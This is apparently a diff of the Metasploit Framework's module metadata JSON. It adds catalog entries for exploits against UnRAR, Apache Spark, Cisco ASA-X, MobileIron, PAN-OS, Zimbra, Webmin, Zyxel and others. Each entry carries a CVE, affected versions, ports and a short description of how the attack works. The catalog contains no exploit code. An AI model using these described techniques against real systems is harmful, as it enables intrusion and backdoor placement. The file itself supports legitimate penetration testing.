    "ref_name": "scanner/ssl/openssl_heartbleed",
@@ -47201,7 +47931,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-07-25 14:51:37 +0000",
    "path": "/modules/auxiliary/scanner/telephony/wardial.rb",
    "is_install_path": true,
    "ref_name": "scanner/telephony/wardial",
@@ -49521,7 +50251,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-05-12 22:15:21 +0000",
+    "mod_time": "2022-07-29 12:58:55 +0000",
    "path": "/modules/auxiliary/server/capture/imap.rb",
    "is_install_path": true,
    "ref_name": "server/capture/imap",
@@ -49779,7 +50509,7 @@
      "agalway-r7",
      "sjanusz-r7"
    ],
-    "description": "This module provides a SMB service that can be used to capture the challenge-response\n        password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.\n        Responses sent by this service have by default a random 8 byte challenge string\n        of format `\\x11\\x22\\x33\\x44\\x55\\x66\\x77\\x88`, allowing for easy cracking using\n        Cain & Abel (NTLMv1) or John the ripper (with jumbo patch).\n\n        To exploit this, the target system must try to authenticate to this\n        module. One way to force an SMB authentication attempt is by embedding\n        a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n        the victim views the web page or email, their system will\n        automatically connect to the server specified in the UNC share (the IP\n        address of the system running this module) and attempt to\n        authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n        respond to queries for names the victim is already looking for.\n\n        Documentation of the above spoofing methods can be found by running `info -d`.",
+    "description": "This module provides a SMB service that can be used to capture the challenge-response\n        password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.\n        Responses sent by this service by default use a random 8 byte challenge string.\n        A specific value (such as `1122334455667788`) can be set using the CHALLENGE option,\n        allowing for easy cracking using Cain & Abel (NTLMv1) or John the Ripper\n        (with jumbo patch).\n\n        To exploit this, the target system must try to authenticate to this\n        module. One way to force an SMB authentication attempt is by embedding\n        a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n        the victim views the web page or email, their system will\n        automatically connect to the server specified in the UNC share (the IP\n        address of the system running this module) and attempt to\n        authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n        respond to queries for names the victim is already looking for.\n\n        Documentation of the above spoofing methods can be found by running `info -d`.",
    "references": [

    ],
@@ -49793,7 +50523,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-21 11:24:15 +0000",
+    "mod_time": "2022-05-27 14:41:06 +0000",
    "path": "/modules/auxiliary/server/capture/smb.rb",
    "is_install_path": true,
    "ref_name": "server/capture/smb",
@@ -56559,6 +57289,59 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/fileformat/unrar_cve_2022_30333": {
+    "name": "UnRAR Path Traversal (CVE-2022-30333)",
+    "fullname": "exploit/linux/fileformat/unrar_cve_2022_30333",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-28",
+    "type": "exploit",
+    "author": [
+      "Simon Scannell",
+      "Ron Bowes"
+    ],
+    "description": "This module creates a RAR file that exploits CVE-2022-30333, which is a\n          path-traversal vulnerability in unRAR that can extract an arbitrary file\n          to an arbitrary location on a Linux system. UnRAR fixed this\n          vulnerability in version 6.12 (open source version 6.1.7).\n\n          The core issue is that when a symbolic link is unRAR'ed, Windows\n          symbolic links are not properly validated on Linux systems and can\n          therefore write a symbolic link that points anywhere on the filesystem.\n          If a second file in the archive has the same name, it will be written\n          to the symbolic link path.",
+    "references": [
+      "CVE-2022-30333",
+      "URL-https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/",
+      "URL-https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946",
+      "URL-https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Generic RAR file"
+    ],
+    "mod_time": "2022-08-22 11:46:50 +0000",
+    "path": "/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb",
+    "is_install_path": true,
+    "ref_name": "linux/fileformat/unrar_cve_2022_30333",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/ftp/proftp_sreplace": {
    "name": "ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",
    "fullname": "exploit/linux/ftp/proftp_sreplace",
@@ -57304,6 +58087,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_spark_rce_cve_2022_33891": {
+    "name": "Apache Spark Unauthenticated Command Injection RCE",
+    "fullname": "exploit/linux/http/apache_spark_rce_cve_2022_33891",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-07-18",
+    "type": "exploit",
+    "author": [
+      "Kostya Kortchinsky",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability in Apache Spark.\n          Successful exploitation results in remote code execution under the context of the Spark application user.\n\n          The command injection occurs because Spark checks the group membership of the user passed\n          in the ?doAs parameter by using a raw Linux command.\n\n          It is triggered by a non-default setting called spark.acls.enable.\n          This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack.\n\n          Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.",
+    "references": [
+      "URL-https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc",
+      "URL-https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891",
+      "CVE-2022-33891"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-09-07 12:45:13 +0000",
+    "path": "/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_spark_rce_cve_2022_33891",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection": {
    "name": "Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection",
    "fullname": "exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection",
@@ -58041,6 +58886,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/cisco_asax_sfr_rce": {
+    "name": "Cisco ASA-X with FirePOWER Services Authenticated Command Injection",
+    "fullname": "exploit/linux/http/cisco_asax_sfr_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-22",
+    "type": "exploit",
+    "author": [
+      "jbaines-r7"
+    ],
+    "description": "This module exploits an authenticated command injection vulnerability affecting\n          Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's\n          ASDM web server and lands in the FirePower Services SFR module's Linux virtual\n          machine as the root user. Access to the virtual machine allows the attacker to\n          pivot to the inside network, and access the outside network. Also, the SFR\n          virtual machine is running snort on the traffic flowing through the ASA, so\n          the attacker should have access to this diverted traffic as well.\n\n          This module requires ASDM credentials in order to traverse the ASDM interface.\n          A similar attack can be performed via Cisco CLI (over SSH), although that isn't\n          implemented here.\n\n          Finally, it's worth noting that this attack bypasses the affects of the\n          `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be\n          available but this attack makes it available).\n\n          Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that\n          support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,\n          and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module\n          versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will\n          receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.",
+    "references": [
+      "CVE-2022-20828",
+      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG",
+      "URL-https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/",
+      "URL-https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Shell Dropper",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-09-02 08:44:04 +0000",
+    "path": "/modules/exploits/linux/http/cisco_asax_sfr_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/cisco_asax_sfr_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cisco_firepower_useradd": {
    "name": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
    "fullname": "exploit/linux/http/cisco_firepower_useradd",
@@ -63288,6 +64195,78 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/mobileiron_core_log4shell": {
+    "name": "MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)",
+    "fullname": "exploit/linux/http/mobileiron_core_log4shell",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2021-12-12",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>",
+      "rwincey",
+      "jbaines-r7"
+    ],
+    "description": "MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server\n        will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS\n        command execution in the context of the tomcat user.\n\n        This module will start an LDAP server that the target will need to connect to.",
+    "references": [
+      "CVE-2021-44228",
+      "URL-https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis",
+      "URL-https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US",
+      "URL-https://www.mandiant.com/resources/mobileiron-log4shell-exploitation"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2022-08-02 11:04:13 +0000",
+    "path": "/modules/exploits/linux/http/mobileiron_core_log4shell.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/mobileiron_core_log4shell",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "AKA": [
+        "Log4Shell",
+        "LogJam"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/http/log4shell_scanner",
+        "exploit/multi/http/log4shell_header_injection"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/mobileiron_mdm_hessian_rce": {
    "name": "MobileIron MDM Hessian-Based Java Deserialization RCE",
    "fullname": "exploit/linux/http/mobileiron_mdm_hessian_rce",
@@ -65000,6 +65979,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/panos_op_cmd_exec": {
+    "name": "Palo Alto Networks Authenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/panos_op_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-09-09",
+    "type": "exploit",
+    "author": [
+      "Mikhail Klyuchnikov",
+      "Nikita Abramov",
+      "UnD3sc0n0c1d0",
+      "jheysel-r7"
+    ],
+    "description": "An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated\n          administrators to execute arbitrary OS commands with root privileges.\n          This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10",
+    "references": [
+      "CVE-2020-2038",
+      "URL-https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/",
+      "URL-https://security.paloaltonetworks.com/CVE-2020-2038",
+      "URL-https://github.com/und3sc0n0c1d0/CVE-2020-2038"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux ",
+      "Unix In-Memory"
+    ],
+    "mod_time": "2022-09-15 10:45:11 +0000",
+    "path": "/modules/exploits/linux/http/panos_op_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/panos_op_cmd_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/panos_readsessionvars": {
    "name": "Palo Alto Networks readSessionVarsFromFile() Session Corruption",
    "fullname": "exploit/linux/http/panos_readsessionvars",
@@ -66031,6 +67076,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/roxy_wi_exec": {
+    "name": "Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE",
+    "fullname": "exploit/linux/http/roxy_wi_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-07-06",
+    "type": "exploit",
+    "author": [
+      "Nuri Çilengir <nuri@prodaft.com>"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability in Roxy-WI\n          prior to version 6.1.1.0. Successful exploitation results in remote code execution\n          under the context of the web server user.\n\n          Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.",
+    "references": [
+      "URL-https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/",
+      "URL-https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532",
+      "URL-https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755",
+      "CVE-2022-31137"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux (Dropper)"
+    ],
+    "mod_time": "2022-07-25 13:05:04 +0000",
+    "path": "/modules/exploits/linux/http/roxy_wi_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/roxy_wi_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/saltstack_salt_api_cmd_exec": {
    "name": "SaltStack Salt REST API Arbitrary Command Execution",
    "fullname": "exploit/linux/http/saltstack_salt_api_cmd_exec",
@@ -66547,6 +67654,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/sourcegraph_gitserver_sshcmd": {
+    "name": "Sourcegraph gitserver sshCommand RCE",
+    "fullname": "exploit/linux/http/sourcegraph_gitserver_sshcmd",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-02-18",
+    "type": "exploit",
+    "author": [
+      "Altelus1",
+      "Spencer McIntyre"
+    ],
+    "description": "A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute\n          arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can\n          then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a\n          feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the\n          commands that are able to be executed through the git exec REST API.",
+    "references": [
+      "CVE-2022-23642",
+      "URL-https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9",
+      "URL-https://github.com/Altelus1/CVE-2022-23642"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 3178,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-07-11 09:48:08 +0000",
+    "path": "/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/sourcegraph_gitserver_sshcmd",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/spark_unauth_rce": {
    "name": "Apache Spark Unauthenticated Command Execution",
    "fullname": "exploit/linux/http/spark_unauth_rce",
@@ -68677,6 +69848,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/webmin_package_updates_rce": {
+    "name": "Webmin Package Updates RCE",
+    "fullname": "exploit/linux/http/webmin_package_updates_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-07-26",
+    "type": "exploit",
+    "author": [
+      "Christophe De La Fuente",
+      "Emir Polat"
+    ],
+    "description": "This module exploits an arbitrary command injection in Webmin\n          versions prior to 1.997.\n\n          Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform\n          package updates and installation. Due to a lack of input\n          sanitization, it is possibe to inject arbitrary command that will be\n          concatenated to the package manager call.\n\n          This exploit requires authentication and the account must have access\n          to the Software Package Updates module.",
+    "references": [
+      "EDB-50998",
+      "URL-https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165",
+      "CVE-2022-36446"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, aarch64",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper (x86 & x64)",
+      "Linux Dropper (ARM64)"
+    ],
+    "mod_time": "2022-08-09 15:09:25 +0000",
+    "path": "/modules/exploits/linux/http/webmin_package_updates_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/webmin_package_updates_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/webmin_packageup_rce": {
    "name": "Webmin Package Updates Remote Command Execution",
    "fullname": "exploit/linux/http/webmin_packageup_rce",
@@ -69030,6 +70265,136 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/zimbra_mboximport_cve_2022_27925": {
+    "name": "Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)",
+    "fullname": "exploit/linux/http/zimbra_mboximport_cve_2022_27925",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-10",
+    "type": "exploit",
+    "author": [
+      "Volexity Threat Research",
+      "Yang_99's Nest",
+      "Ron Bowes"
+    ],
+    "description": "This module POSTs a ZIP file containing path traversal characters to\n          the administrator interface for Zimbra Collaboration Suite. If\n          successful, it plants a JSP-based backdoor within the web directory, then\n          executes it.\n\n          The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n          ZIP implementation that can result in the extraction of an arbitrary file\n          to an arbitrary location on the host.\n\n          This issue is exploitable on the following versions of Zimbra:\n\n          * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n          * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n          Note that the Open Source Edition is not affected.",
+    "references": [
+      "CVE-2022-27925",
+      "CVE-2022-37042",
+      "URL-https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/",
+      "URL-https://www.cisa.gov/uscert/ncas/alerts/aa22-228a",
+      "URL-https://www.yang99.top/index.php/archives/82/",
+      "URL-https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24",
+      "URL-https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 7071,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Zimbra Collaboration Suite"
+    ],
+    "mod_time": "2022-08-22 12:11:08 +0000",
+    "path": "/modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/zimbra_mboximport_cve_2022_27925",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
+  "exploit_linux/http/zimbra_unrar_cve_2022_30333": {
+    "name": "UnRAR Path Traversal in Zimbra (CVE-2022-30333)",
+    "fullname": "exploit/linux/http/zimbra_unrar_cve_2022_30333",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-28",
+    "type": "exploit",
+    "author": [
+      "Simon Scannell",
+      "Ron Bowes"
+    ],
+    "description": "This module creates a RAR file that can be emailed to a Zimbra server\n          to exploit CVE-2022-30333. If successful, it plants a JSP-based\n          backdoor in the public web directory, then executes that backdoor.\n\n          The core vulnerability is a path-traversal issue in unRAR that can\n          extract an arbitrary file to an arbitrary location on a Linux system.\n\n          This issue is exploitable on the following versions of Zimbra, provided\n          UnRAR version 6.11 or earlier is installed:\n\n          * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n          * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)",
+    "references": [
+      "CVE-2022-30333",
+      "URL-https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/",
+      "URL-https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946",
+      "URL-https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25",
+      "URL-https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32",
+      "URL-https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Zimbra Collaboration Suite"
+    ],
+    "mod_time": "2022-08-17 10:19:36 +0000",
+    "path": "/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/zimbra_unrar_cve_2022_30333",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/zimbra_xxe_rce": {
    "name": "Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF",
    "fullname": "exploit/linux/http/zimbra_xxe_rce",
@@ -72758,6 +74123,59 @@
    ],
    "needs_cleanup": null
  },
+  "exploit_linux/local/vmware_workspace_one_access_certproxy_lpe": {
+    "name": "VMware Workspace ONE Access CVE-2022-31660",
+    "fullname": "exploit/linux/local/vmware_workspace_one_access_certproxy_lpe",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-08-02",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n            to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n            invokes it. The service control is permitted via the sudo configuration without a password.",
+    "references": [
+      "CVE-2022-31660",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2022-0021.html"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2022-08-03 17:45:06 +0000",
+    "path": "/modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/vmware_workspace_one_access_certproxy_lpe",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "exploit_linux/local/yum_package_manager_persistence": {
    "name": "Yum Package Manager Persistence",
    "fullname": "exploit/linux/local/yum_package_manager_persistence",
@@ -72801,6 +74219,60 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/zimbra_slapper_priv_esc": {
+    "name": "Zimbra zmslapd arbitrary module load",
+    "fullname": "exploit/linux/local/zimbra_slapper_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2021-10-27",
+    "type": "exploit",
+    "author": [
+      "Darren Martyn",
+      "Ron Bowes"
+    ],
+    "description": "This module exploits CVE-2022-37393, which is a vulnerability in\n          Zimbra's sudo configuration that permits the zimbra user to execute\n          the zmslapd binary as root with arbitrary parameters. As part of its\n          intended functionality, zmslapd can load a user-defined configuration\n          file, which includes plugins in the form of .so files, which also\n          execute as root.",
+    "references": [
+      "CVE-2022-37393",
+      "URL-https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-08-04 08:19:44 +0000",
+    "path": "/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/zimbra_slapper_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/zpanel_zsudo": {
    "name": "ZPanel zsudo Local Privilege Escalation Exploit",
    "fullname": "exploit/linux/local/zpanel_zsudo",
@@ -72846,6 +74318,60 @@
    ],
    "needs_cleanup": null
  },
+  "exploit_linux/local/zyxel_suid_cp_lpe": {
+    "name": "Zyxel Firewall SUID Binary Privilege Escalation",
+    "fullname": "exploit/linux/local/zyxel_suid_cp_lpe",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-14",
+    "type": "exploit",
+    "author": [
+      "jbaines-r7"
+    ],
+    "description": "This module exploits CVE-2022-30526, a local privilege escalation vulnerability that\n          allows a low privileged user (e.g. nobody) escalate to root. The issue stems from\n          a suid binary that allows all users to copy files as root. This module overwrites\n          the firewall's crontab to execute an attacker provided script, resulting in code\n          execution as root.\n\n          In order to use this module, the attacker must first establish shell access. For\n          example, by exploiting CVE-2022-30525.\n\n          Known affected Zyxel models are: USG FLEX (50, 50W, 100W, 200, 500, 700),\n          ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.",
+    "references": [
